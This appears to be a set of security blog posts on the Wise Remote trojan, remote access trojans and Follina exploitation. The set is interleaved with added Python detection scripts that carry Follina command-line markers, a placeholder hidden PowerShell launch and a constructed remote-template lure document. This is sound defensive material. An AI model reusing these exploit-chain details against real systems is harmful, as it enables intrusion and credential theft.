The Command Hub of Wise Remote

Serving as the central command hub, Wise Remote boasts a potent control panel that bestows unprecedented oversight and control over a vast network of up to 10,000 infected machines. With a single command, the operator can unleash devastating DDoS attacks or orchestrate a range of malicious activities, amplifying the disruptive potential of this malware.

Wise Remote Trojan: Infostealer, RAT, DDoS Bot, and Ransomware

As the cybersecurity community races to counter this emerging threat, the significance of Wise Remote becomes increasingly evident. Its adaptability, sophistication, and capacity for stealth underline the need for robust security measures and unwavering vigilance in today’s rapidly evolving digital landscape.

Remote Access Trojan (RAT Malware) https://gridinsoft.com/blogs/remote-access-trojan-meaning/ Thu, 29 Dec 2022 13:11:57 +0000

A Remote Access Trojan is software that gives an attacker unauthorized access to a victim's computer or allows covert surveillance of it. Remote Access Trojans are often disguised as legitimate programs and give the attacker unhindered access. Their capabilities include tracking user behavior, copying files, and using the victim's bandwidth for criminal activity.

What is a Remote Access Trojan (RAT)?

A Remote Access Trojan (RAT) is a malicious program that opens a backdoor, allowing an attacker to control the victim's device. Users often download RATs together with a seemingly legitimate program, e.g. inside cracked games from torrents, or open them as an email attachment. Once an attacker compromises a host, they can use it to spread the RAT to further vulnerable computers and so build a botnet. RATs are also deployed as the payload of exploit kits. Once running, the RAT connects to the command-and-control (C&C) server the attackers operate. Most modern RATs initiate this connection outbound, often over common ports such as 80 or 443, so that no inbound port has to be opened on the victim; older RATs instead listened on a predefined TCP port and waited for the attacker to connect. A RAT runs with the privileges of the user who launched it, and many include privilege escalation or UAC bypass routines, so an attacker can do almost anything on the victim's computer, such as:

  • Use spyware and keyloggers to track the victim’s behavior
  • Gain access to sensitive data, including social security numbers and credit card information
  • View and record video from a webcam and microphone
  • Take screenshots
  • Format disks
  • Download, change or delete files
  • Distribute malware and viruses

How does a Remote Access Trojan work?

Like any other type of malware, a RAT can be attached to an email or posted on a malicious website. Cybercriminals can also exploit a vulnerability in a system or program to install it. A RAT provides functionality similar to legitimate remote-desktop tools such as RDP or AnyDesk, but is built to stay hidden. It establishes a command and control (C2) channel with the attacker's server; the attacker sends commands over this channel and the RAT returns the results. RATs also ship with built-in methods for hiding their C2 traffic from detection, such as encryption, mimicking legitimate protocols, and communicating only at intervals.

Remote access trojan mechanism

RATs can be combined with additional modules that provide further capabilities. For example, an attacker may first gain a foothold with a RAT and, after examining the infected system, decide to install a keylogger. Depending on the RAT, it may have a built-in keylogging feature, the ability to download and load a keylogger module, or it may simply download and run a standalone keylogger.

Why Remote Access Trojan is Dangerous?

A 2015 incident in Ukraine illustrates the nefarious nature of RAT programs. At the time, attackers used remote-control malware to cut power to 80,000 people. They gained remote access to a computer that was authenticated to the SCADA (supervisory control and data acquisition) systems controlling the region's electricity distribution. The Remote Access Trojan inherited the elevated privileges of the authenticated user on the network, which let the attackers reach sensitive resources they could not otherwise have touched. Thus, an attack using RATs can take on a threatening scale, up to a threat to national security.

Unfortunately, cybersecurity teams often have difficulty detecting RATs. This is because the malware typically carries many concealment features that let it evade detection. In addition, RATs throttle their resource usage so that there is no noticeable performance degradation, which makes the threat harder to spot.

Ways of using RATs

The following are ways in which a RAT attack can compromise individual users, organizations, or even entire populations:

  • Spying and blackmail: An attacker who has deployed a RAT on a user's device gains access to the user's cameras and microphones. Consequently, he can take pictures of the user and his surroundings and then use this material to launch more sophisticated attacks or for blackmail.
  • Launching Distributed Denial of Service (DDoS) attacks: Attackers install RATs on many user devices, then use those devices to flood the target server with traffic. Even though the attack can degrade network performance for the participating hosts, their users are often unaware that their devices are being used for DDoS attacks.
  • Cryptomining: In some cases, attackers use RATs to mine cryptocurrency on the victim's computer. By scaling this to many devices, they can make substantial profits.
  • Remote file storage: Sometimes attackers use RATs to store illegal content on unsuspecting victims' machines. That way, authorities cannot shut down the attacker's account or storage server, because the material is kept on devices belonging to legitimate users.
  • Industrial systems compromise: As described above, attackers can use RATs to gain control over large industrial systems, such as electricity and water supplies. By sabotaging these systems an attacker can cause significant damage to industrial equipment and disrupt critical services in entire areas.

Remote Access Trojan Examples

Sakula

Sakula appears to be harmless software and carries a valid digital signature, but it is malware, first seen in 2012 and used against high-value targets. It gives attackers full remote administration of the device and uses simple, unencrypted HTTP requests to communicate with its C&C server. It also bundles the Mimikatz credential-theft tool to perform pass-the-hash authentication, reusing Windows authentication hashes to hijack existing sessions without knowing the plaintext password.

KjW0rm

KjW0rm is a worm written in VBScript, first seen in 2014, which uses obfuscation to make detection on Windows computers difficult. It has many variants; the older parent version is called Njw0rm. All variants belong to the same family and share much of their workflow. It installs itself stealthily and then opens a backdoor that lets attackers take complete control of the machine and send data back to the C&C server.

Havex

Havex is a Remote Access Trojan discovered in 2013 as part of a large-scale espionage campaign targeting industrial control systems (ICS) used across many industries. It is attributed to the group known as Dragonfly or Energetic Bear. It gives attackers remote control over compromised hosts in industrial environments. Havex exists in several variants to evade detection and keeps a minimal footprint on the victim's device. It communicates with its C&C server over HTTP and HTTPS.

Agent.BTZ/ComRat

Agent.BTZ/ComRAT is a Remote Access Trojan that became infamous after it was used to breach U.S. military networks in 2008; it is related to the Uroburos (Snake) toolkit of the same group. The first version probably appeared in 2007 and had worm-like properties, spreading via removable media. Between 2007 and 2012 its developers released two major versions. It is most likely a development of Russian state actors. It can be delivered via phishing and uses encryption, anti-analysis and anti-forensic techniques to avoid detection. It provides complete administrative control over the infected machine and transmits data back to its C&C server.

Dark Comet

Backdoor.DarkComet is a Remote Access Trojan that runs in the background and stealthily collects information about the system, logged-on users and network activity. It was first identified in 2011 and is still in use today. It provides complete administrative control over infected devices; for example, it can disable Task Manager, the firewall or User Account Control (UAC) on Windows machines. DarkComet also encrypts its C&C traffic, which hampers detection by antivirus and network monitoring.

AlienSpy

AlienSpy is a cross-platform RAT that can build payloads for Windows, Linux, Mac OS X and Android. It collects information about the target system, activates the webcam and connects to the C&C server over an encrypted channel, providing complete control over the device. AlienSpy also uses anti-analysis techniques to detect whether it is running inside a virtual machine. According to the researcher who analysed the threat, the operator behind the service is a native Spanish speaker, probably Mexican.

Heseber BOT

The Heseber BOT is built on the legitimate VNC remote access tool. It uses VNC to control the target device remotely and to transfer data to the C&C server. It does not grant administrative access to the machine unless the user it runs as already has such permissions. Because VNC is a legitimate tool, antivirus products often do not identify Heseber as a threat.

Sub7

Sub7 is a Remote Access Trojan that runs on a client-server model. The backdoor was first discovered in May 1999 and ran on Windows 9x and the Windows NT family of operating systems up to Windows 8.1. The server is a component deployed on the victim machine, and the client is the attacker’s GUI to control the remote system. The server tries to install itself into a Windows directory and, once deployed, provides webcam capture, port redirection, chat, and an easy-to-use registry editor.

Back Orifice

Back Orifice is a Remote Access Trojan for Windows introduced in 1998. It supports most versions from Windows 95 onward and is deployed as a server on the target device. It has a small footprint, comes with a GUI client, and gives an attacker complete control over the system; one client can manage several compromised servers at once. The server communicates with its client over TCP or UDP, usually on port 31337.

How To Protect Against Remote Access Trojan?

As stated above, Remote Access Trojans rely on their stealthiness. Once one is running, you will likely struggle to detect it, even if the exact sample is not new. That is why the best way to protect against a Remote Access Trojan is to not give it a chance to run in the first place. The following methods are proactive measures that severely decrease the chance of malware being introduced and of the trouble that follows.

Security training

Unfortunately, the weakest link in any defense is the human element, the root cause of most security incidents, and RATs are no exception. An organization's strategy for defending against RATs therefore depends on organization-wide security training. Victims usually launch this malware themselves, through infected attachments and links in phishing campaigns, so employees must be vigilant not to accidentally contaminate the company network and jeopardize the entire organization.

Using multi-factor authentication (MFA)

Since RATs typically try to steal usernames and passwords for online accounts, using MFA can limit the consequences if a person's credentials are compromised. The main advantage of MFA is that it adds further layers of security and reduces the likelihood that a user's identity will be taken over. If one factor, such as the user's password, is stolen, the other factors still stand in the attacker's way. Keep in mind that a RAT running on the device can also capture session cookies after the user has authenticated, so MFA reduces the blast radius of stolen passwords but does not make an infected endpoint safe.

Strict access control procedures

Attackers can use RATs to compromise administrator credentials and gain access to valuable data on the organization's network. With strict access controls, you can limit the consequences of compromised credentials. More stringent measures include:

  • Stricter firewall rules, including restrictions on outbound traffic
  • Safelisting IP addresses for authorized users of administrative interfaces
  • Using more advanced endpoint protection solutions

Solutions for secure remote access

Every new endpoint connected to your network is a potential RAT compromise opportunity for attackers. Therefore, to minimize the attack surface, it’s important to only allow remote access through secure connections established through VPNs or security gateways. You can also use a clientless solution for remote access. It does not require additional plug-ins or software on end-user devices, as these devices are also targets for attackers.

Zero-trust security technologies

Recently, zero-trust security models have grown in popularity because they adhere to the “never trust, always verify” principle. Consequently, the zero-trust security approach offers precise control over lateral movements instead of full network access. It is critical to suppressing RAT attacks, as attackers use lateral moves to infect other systems and access sensitive data.

Focus on infection vectors

Like other malware, a Remote Access Trojan is a threat only once it is installed and running on the target computer. Using secure browsing, anti-phishing solutions, and constantly patching systems can minimize the likelihood of a RAT infection. Overall, these actions are good practice for improving security in any case, not only against Remote Access Trojans.

Pay attention to abnormal behavior

RATs are Trojans that may present themselves as legitimate applications while hiding malicious functionality behind the legitimate front. Tracking applications and the system for abnormal behavior, such as an office application spawning a shell or an unknown program starting at logon, can reveal signs of a Remote Access Trojan.

Monitoring network traffic

An attacker uses a RAT to remotely control the infected computer over the network, so a RAT deployed on a local device has to communicate with a remote C&C server. Therefore, watch for unusual network traffic that could be such C&C communication: connections to rare or newly seen destinations, regular "beaconing" at fixed intervals, or unexpected protocols on common ports. Network firewalls, web proxies and intrusion detection systems are the tools for monitoring and blocking C&C traffic; a web application firewall protects your own web applications and does not see an endpoint's outbound connections.
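One practical way to act on the beaconing point above is to look for periodic connections in proxy or flow logs. The script below is an added example, not code from the Gridinsoft article: the log format, the field names and the sample lines are all constructed for illustration (the IP addresses are documentation ranges), and the thresholds are assumptions to tune for your own environment.

```python
"""Flag periodic outbound connections (C2 beaconing) in proxy or flow logs.

This is an added example, not code from the Gridinsoft article. The log format
and the sample lines are constructed for illustration: one line per connection,
"<ISO timestamp> <src_ip> <dst_ip>:<dst_port> <bytes_out>". Adapt parse_line()
to your own proxy, NetFlow or Zeek conn.log schema.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample: 10.0.0.5 talks to 203.0.113.10 every 30 s with near-constant
# payload sizes (beacon-like), and to 198.51.100.7 at irregular times with widely
# varying sizes (browsing-like). Both addresses are documentation ranges.
SAMPLE_LOG = """\
2024-03-01T10:00:00 10.0.0.5 203.0.113.10:443 412
2024-03-01T10:00:02 10.0.0.5 198.51.100.7:443 9821
2024-03-01T10:00:30 10.0.0.5 203.0.113.10:443 416
2024-03-01T10:01:00 10.0.0.5 203.0.113.10:443 410
2024-03-01T10:01:30 10.0.0.5 203.0.113.10:443 415
2024-03-01T10:01:47 10.0.0.5 198.51.100.7:443 2200
2024-03-01T10:02:00 10.0.0.5 203.0.113.10:443 413
2024-03-01T10:02:05 10.0.0.5 198.51.100.7:443 60210
2024-03-01T10:02:30 10.0.0.5 203.0.113.10:443 411
2024-03-01T10:03:00 10.0.0.5 203.0.113.10:443 417
2024-03-01T10:05:12 10.0.0.5 198.51.100.7:443 1500
2024-03-01T10:05:20 10.0.0.5 198.51.100.7:443 33000
"""


def parse_line(line):
    """Split one constructed log line into (timestamp, src, dst, bytes_out)."""
    ts, src, dst, nbytes = line.split()
    return datetime.fromisoformat(ts), src, dst, int(nbytes)


def find_beacons(log_text, min_events=5, max_cv=0.2):
    """Return (src, dst) pairs whose connections arrive at near-constant
    intervals with near-constant sizes.

    Regularity is measured by the coefficient of variation (stddev / mean) of
    the inter-arrival gaps and of the byte counts; a real implant adds jitter,
    so the test is a threshold (max_cv) rather than exact equality.
    """
    flows = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            ts, src, dst, nbytes = parse_line(line)
            flows[(src, dst)].append((ts, nbytes))

    findings = []
    for (src, dst), events in flows.items():
        if len(events) < min_events:          # too few samples to judge periodicity
            continue
        events.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(events, events[1:])]
        sizes = [n for _, n in events]
        gap_cv = pstdev(gaps) / mean(gaps) if mean(gaps) > 0 else float("inf")
        size_cv = pstdev(sizes) / mean(sizes) if mean(sizes) > 0 else float("inf")
        if gap_cv <= max_cv and size_cv <= max_cv:
            findings.append({
                "src": src, "dst": dst, "count": len(events),
                "interval_s": round(mean(gaps), 1),
                "gap_cv": round(gap_cv, 3), "size_cv": round(size_cv, 3),
            })
    return findings


if __name__ == "__main__":
    for f in find_beacons(SAMPLE_LOG):
        print(f"possible beacon: {f['src']} -> {f['dst']} every ~{f['interval_s']}s "
              f"({f['count']} connections, gap_cv={f['gap_cv']}, size_cv={f['size_cv']})")
```

On the sample the 30-second flow to 203.0.113.10 is reported and the irregular browsing flow is not. Software update checks and monitoring agents beacon too, so treat a hit as a lead to enrich with destination reputation and process information rather than as a verdict on its own.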

Implement least privilege

The concept of least privilege implies that applications, users, systems, etc., should be restricted to the permissions and access they need to do their jobs. Therefore, using the least privilege can help limit an attacker’s actions with RAT.

Are Remote Access Trojans illegal?

Well, yes, but actually, no. It all depends on how and what you use it for. It is not the program itself that makes such tasks illegal, it is the use. You can test and execute a Remote Access Trojan you have written in a home lab, and you can use one with written permission from the other party. However, if you use a RAT maliciously, you may face legal consequences. To keep the distinction clear, professionals use the term "remote access tools" for legitimate access and control and "remote access trojan" for illegitimate access and control.

Attackers Exploit MSDT Follina Bug to Drop RAT https://gridinsoft.com/blogs/threat-actors-exploit-msdt-follina-bug-to-drop-rat-and-infostealer/ Thu, 09 Jun 2022 10:09:21 +0000

Security specialists caution users about the exploitation of the recently disclosed Follina bug found in all supported versions of Windows. Threat actors have actively used this vulnerability to install payloads such as the AsyncRAT trojan and browser infostealers.

Understanding the Follina Vulnerability

On May 27, 2022, the public became aware of a remote code execution (RCE) vulnerability, known as Follina. Soon after its disclosure, experts observed several instances of exploitation.

Follina (CVE-2022-30190) is a vulnerability identified in the Microsoft Support Diagnostic Tool (MSDT), enabling RCE on all susceptible systems. The exploitation occurs via the ms-msdt protocol handler scheme.

To exploit Follina, threat actors do not need macros to trick victims. Instead, they deliver a specially crafted Word document.

Through Word's remote template feature, the document retrieves and loads an external HTML file. That HTML invokes the ms-msdt: URI scheme, which is what lets the attacker run PowerShell code on the targeted Windows system. Protected View blocks this path for files carrying the Mark-of-the-Web, but RTF files were shown to trigger it from the Explorer preview pane without the document being opened at all.
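Because the lure document has to reference the external HTML somewhere in its package, a static check of the .docx relationships catches this class of document before it is opened. The script below is an added example, not code from the Gridinsoft article or from any Follina sample: the document it builds in memory is constructed for illustration, and the URLs in it are placeholders in a reserved domain, not real attacker infrastructure.

```python
"""Static triage of .docx files for external relationships, the mechanism the
Follina lure documents used to pull a remote HTML file.

This is an added example, not code from the Gridinsoft article. The document
built in memory by build_sample_docx() is constructed for illustration and the
URLs inside it are placeholders in a reserved domain, not real attacker
infrastructure. Real documents carry many more parts; only the .rels parts
matter here.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OOXML_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
REMOTE_SCHEMES = ("http:", "https:", "ms-msdt:")


def external_relationships(docx_bytes):
    """Yield (part, relationship type, target) for every relationship with
    TargetMode="External" in any .rels part of the OOXML zip."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(RELS_NS + "Relationship"):
                if rel.get("TargetMode", "Internal") == "External":
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    yield name, rel_type, rel.get("Target", "")


def triage(docx_bytes):
    """Rate each external relationship. Hyperlinks to the web are normal in
    documents; a template, OLE object or similar part fetched from http(s), a
    UNC path or an ms-msdt: URI is the pattern to escalate."""
    findings = []
    for part, rel_type, target in external_relationships(docx_bytes):
        t = target.lower()
        remote = t.startswith(REMOTE_SCHEMES) or t.startswith("\\\\")
        severity = "high" if remote and rel_type != "hyperlink" else "info"
        findings.append({"part": part, "type": rel_type,
                         "target": target, "severity": severity})
    return findings


def build_sample_docx(template_target):
    """Minimal constructed OOXML package whose settings.xml.rels attaches an
    external template at template_target (the remote-template injection layout)
    plus an ordinary web hyperlink in document.xml.rels."""
    settings_rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        f'<Relationship Id="rId1" Type="{OOXML_REL}attachedTemplate" '
        f'Target="{template_target}" TargetMode="External"/>'
        f'<Relationship Id="rId2" Type="{OOXML_REL}styles" Target="styles.xml"/>'
        '</Relationships>'
    )
    document_rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        f'<Relationship Id="rId1" Type="{OOXML_REL}hyperlink" '
        'Target="https://www.example.invalid/careers" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/_rels/settings.xml.rels", settings_rels)
        z.writestr("word/_rels/document.xml.rels", document_rels)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx("http://templates.example.invalid/fetch.html")
    for f in triage(sample):
        print(f"[{f['severity']}] {f['part']}: {f['type']} -> {f['target']}")
```

Scanning every .rels part rather than only settings.xml.rels matters: the same external-target pattern appears as an oleObject relationship in document.xml.rels in some samples, and the check should not depend on which part the attacker chose. A legitimate attached template usually points at a local file: path and is reported as informational only.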

Microsoft has issued multiple workarounds and advisories to mitigate the vulnerability’s risk.

Functioning of the Follina Vulnerability

Upon the dissemination of this vulnerability’s details online, threat actors eagerly commenced the installation of their payloads.

In a successful Follina exploit, the HTML document is processed by WinWord, which then starts msdt.exe as a child process.

The registry entry for the ms-msdt: protocol handler (under HKEY_CLASSES_ROOT\ms-msdt) is what allows this handoff. msdt.exe then triggers sdiagnhost.exe, the Scripted Diagnostics Native Host, which runs the diagnostic package and ends up spawning the final payload, in Follina's case PowerShell.
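The process chain just described is a good basis for a detection rule on process-creation telemetry. The script below is an added example, not code from the Gridinsoft article: the events are constructed in the shape of Sysmon Event ID 1 records (field names follow Sysmon), the msdt.exe command line carries a placeholder instead of any real payload, and the marker strings and rule names are my own choices.

```python
"""Process-creation detection for the Follina execution chain above:
an Office application starting msdt.exe, then sdiagnhost.exe (the Scripted
Diagnostics Native Host) spawning the payload.

This is an added example, not code from the Gridinsoft article. The events are
constructed in the shape of Sysmon Event ID 1 (ProcessCreate) records; field
names follow Sysmon, and the msdt.exe command line uses a placeholder in place
of any real payload.
"""
import ntpath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Strings that appeared in msdt.exe command lines of in-the-wild Follina samples.
MSDT_MARKERS = ("ms-msdt:", "it_browseforfile", "pcwdiagnostic")

# Constructed sample events. Note that sdiagnhost.exe is started via COM, so its
# parent is svchost.exe, not msdt.exe: the chain is not one straight PID line.
SAMPLE_EVENTS = [
    {"ProcessId": 4100, "ParentProcessId": 3320,
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\user\Downloads\Offer.docx"'},
    {"ProcessId": 4188, "ParentProcessId": 4100,
     "Image": r"C:\Windows\System32\msdt.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"C:\WINDOWS\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force '
                    r'/param "IT_BrowseForFile=$(PLACEHOLDER) IT_AutoTroubleshoot=ts_AUTO"'},
    {"ProcessId": 4250, "ParentProcessId": 900,
     "Image": r"C:\Windows\System32\sdiagnhost.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\WINDOWS\system32\sdiagnhost.exe -Embedding"},
    {"ProcessId": 4260, "ParentProcessId": 4250,
     "Image": r"C:\Windows\System32\conhost.exe",
     "ParentImage": r"C:\Windows\System32\sdiagnhost.exe",
     "CommandLine": r"\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1"},
    {"ProcessId": 4300, "ParentProcessId": 4250,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\sdiagnhost.exe",
     "CommandLine": r"powershell.exe -nop -w hidden -c PLACEHOLDER"},
    # Benign control: a user opens a troubleshooter from Control Panel.
    {"ProcessId": 5000, "ParentProcessId": 3320,
     "Image": r"C:\Windows\System32\msdt.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"C:\WINDOWS\system32\msdt.exe -id NetworkDiagnosticsWeb"},
]


def _name(path):
    """Lower-cased file name of a Windows path (handles \\??\\ prefixes too)."""
    return ntpath.basename(path).lower()


def detect_follina_chain(events):
    """Return one finding per suspicious ProcessCreate event.

    Rule 1: msdt.exe started by an Office application, or with the ms-msdt /
    PCWDiagnostic / IT_BrowseForFile markers on its command line.
    Rule 2: any child of sdiagnhost.exe other than its own console host.
    Correlating on parent image names rather than walking PIDs is deliberate,
    since the COM activation of sdiagnhost.exe breaks the parent chain.
    """
    findings = []
    for ev in events:
        child, parent = _name(ev["Image"]), _name(ev["ParentImage"])
        cmd = ev.get("CommandLine", "").lower()
        if child == "msdt.exe" and (parent in OFFICE_APPS or any(m in cmd for m in MSDT_MARKERS)):
            findings.append({"rule": "msdt_from_office_or_marker", "pid": ev["ProcessId"],
                             "parent": parent, "child": child})
        elif parent == "sdiagnhost.exe" and child != "conhost.exe":
            findings.append({"rule": "sdiagnhost_spawned_child", "pid": ev["ProcessId"],
                             "parent": parent, "child": child})
    return findings


if __name__ == "__main__":
    for f in detect_follina_chain(SAMPLE_EVENTS):
        print(f"{f['rule']}: pid {f['pid']} {f['parent']} -> {f['child']}")
```

On the sample events the rules fire on the msdt.exe launched by WINWORD.EXE and on the PowerShell child of sdiagnhost.exe, while the troubleshooter started from Control Panel and the console host are left alone. Rule 2 is the more durable of the two, because it does not depend on which application rendered the document or on how the command line was obfuscated.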

AsyncRAT and Browser Infostealer via Follina Vulnerability

It has been observed that threat actors deployed a diverse range of payloads in successful exploitation instances. One instance involved deploying the remote access Trojan AsyncRAT, complete with a valid digital signature.


Upon execution, this trojan checks for installed antivirus software. Its primary function is to gather system information such as operating system details, its own execution path, the username and hardware identifiers, and to transmit it to a command-and-control (C&C) server.


Once its task is complete, the malware awaits further commands from the C&C server and executes them on the compromised system.

Another payload instance was a browser infostealer, targeting various browser data such as saved login credentials and cookies from browsers like Edge, Chrome, and Firefox.

Patching the Follina Vulnerability

While most exploits of the vulnerability occur through malicious documents, researchers have discovered alternative methods enabling successful Follina exploitation, including manipulation of HTML content in network traffic.

“While the malicious document approach is highly concerning, the less documented methods by which the exploit can be triggered are troubling until patched,” said Tom Hegel, senior threat researcher at security firm SentinelOne. “I would expect opportunistic and targeted threat actors to use this vulnerability in a variety of ways when the option is available—it’s just too easy.”

The Follina flaw was first noted in August 2020 by an undergraduate researcher and reported to Microsoft in April 2022. The company has proposed mitigations, including using Microsoft Defender Antivirus to monitor for and block exploitation, and disabling the ms-msdt: URL protocol handler in the registry so that Office can no longer hand off to the Support Diagnostic Tool.


Microsoft acknowledged that the vulnerability was being exploited and has since patched the issue. At the time, however, the company had not classified the vulnerability as a "zero-day", i.e. a previously unknown vulnerability.

APT actors utilizing the vulnerability

More alarmingly, the Follina vulnerability has been observed as part of longer infection chains. For example, security firm Proofpoint observed Chinese APT actor TA413 sending malicious URLs disguised as emails from the Central Tibetan Administration.

The vulnerability has been employed at different stages in threat actor infection chains, depending on the tactics and toolkits used.


It has been used against numerous targets in Nepal, Belarus, the Philippines, India, and Russia. Proofpoint’s vice president of threat research, Sherrod DeGrippo, identified multiple instances of vulnerability exploitation within phishing campaigns.

The vulnerability affects all supported Windows versions, Office ProPlus, Office 2021, Office 2013 through 2019, and Microsoft Office 365, receiving a 7.8 CVSS score.

Government workers impacted by the vulnerability

In addition to targeting various entities across different countries, specialists report attacks on government workers leveraging this vulnerability.

State-sponsored hackers attempted to exploit the Follina vulnerability in Microsoft Office against U.S. and E.U government targets through a phishing campaign.

So far researchers have not identified which government was behind an attack.

Emails sent in a phishing campaign to government workers

The malicious emails of the phishing campaign contained fake recruitment pitches promising a 20 percent salary increase. To learn more, recipients were urged to open the accompanying email attachment.

Sherrod DeGrippo, vice president of threat research at Proofpoint, tweeted about a related incident in which about 10 of the company's customers received over 1,000 messages with the same text.
